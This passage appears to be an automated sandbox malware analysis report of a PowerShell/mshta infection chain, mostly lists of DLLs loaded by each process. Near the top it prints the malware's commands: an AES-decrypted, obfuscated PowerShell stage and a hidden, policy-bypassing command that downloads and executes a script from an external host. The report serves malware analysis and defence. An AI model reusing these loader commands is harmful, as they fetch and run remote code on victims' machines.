7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1769565150.0000000003319000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb//: source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb. source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
